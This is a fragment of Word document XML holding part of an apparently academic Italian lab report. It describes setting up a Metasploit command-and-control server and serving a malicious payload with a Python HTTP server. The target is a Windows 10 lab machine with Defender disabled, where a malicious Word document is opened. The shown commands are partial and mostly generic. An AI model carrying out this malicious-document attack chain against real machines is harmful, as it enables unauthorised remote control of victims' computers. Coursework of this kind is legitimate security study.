      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00196577" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statico</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, il software utilizzato per creare il server C2 è </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, è stato utilizzato il metodo visto a lezione, di seguito riporto </w:t>
      </w:r>
      <w:r w:rsidR="00BA0797" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> comandi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77275668" w14:textId="74CA2EC2" w:rsidR="00B355D4" w:rsidRPr="00D1660C" w:rsidRDefault="00B355D4" w:rsidP="003D71C6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lastRenderedPageBreak/>
        <w:t>//creo il software malevolo</w:t>
      </w:r>
      <w:r w:rsidR="0081456B" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> da scaricare nella macchina della vittima</w:t>
      </w:r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 xml:space="preserve">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proofErr w:type="gramStart"/>
      <w:r w:rsidR="00196577">
        <w:t>porta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3308BF2A" w14:textId="251A6859" w:rsidR="0081456B" w:rsidRPr="00D1660C" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA55F68" w14:textId="62E62FAE" w:rsidR="0081456B" w:rsidRPr="00D1660C" w:rsidRDefault="0081456B" w:rsidP="0081456B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// metto in ascolto un altro server per permettere di scaricare il payload malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368B0F9" w14:textId="213281B1" w:rsidR="0081456B" w:rsidRPr="00D1660C" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2ECAC" w14:textId="63E62EC9" w:rsidR="00B160DA" w:rsidRPr="00D1660C" w:rsidRDefault="00B160DA" w:rsidP="0081456B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VITTIMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FA8A2" w14:textId="2350C97F" w:rsidR="00B160DA" w:rsidRPr="00D1660C" w:rsidRDefault="00B160DA" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>La vittima è una macchina Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con Windows Defender disabilitato e con pacchetto Office installato</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA0797" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>per permettere l’apertura del document</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00BA0797" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word malevolo</w:t>
      </w:r>
      <w:r w:rsidR="00A536A2" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Ho utilizzato la macchina Windows fornita a lezione e ho scaricato il pac</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hetto Office con l’account accademico.</w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> La vittima non ha un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> statico;</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e due machine sono connesse ad una rete</w:t>
      </w:r>
      <w:r w:rsidR="00D72A89" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con</w:t>
      </w:r>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B31DDC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> il cui indirizzo è 192.168.43.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FBD26" w14:textId="77777777" w:rsidR="0081456B" w:rsidRPr="00D1660C" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0081456B" w:rsidRPr="00D1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1C0B72"/>
    <w:rsid w:val="002214D0"/>
    <w:rsid w:val="003104B9"/>
    <w:rsid w:val="003833E3"/>
    <w:rsid w:val="00387493"/>
    <w:rsid w:val="003D71C6"/>
    <w:rsid w:val="004E5B38"/>
    <w:rsid w:val="007E6D03"/>
    <w:rsid w:val="0080432E"/>
    <w:rsid w:val="0081456B"/>
    <w:rsid w:val="00A536A2"/>
    <w:rsid w:val="00AE059A"/>
    <w:rsid w:val="00B046EC"/>
    <w:rsid w:val="00B160DA"/>
    <w:rsid w:val="00B31DDC"/>
    <w:rsid w:val="00B355D4"/>
    <w:rsid w:val="00B40B24"/>
    <w:rsid w:val="00BA0797"/>
    <w:rsid w:val="00CF6E38"/>
    <w:rsid w:val="00D1660C"/>
    <w:rsid w:val="00D5452C"/>
    <w:rsid w:val="00D72A89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3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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T13:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-0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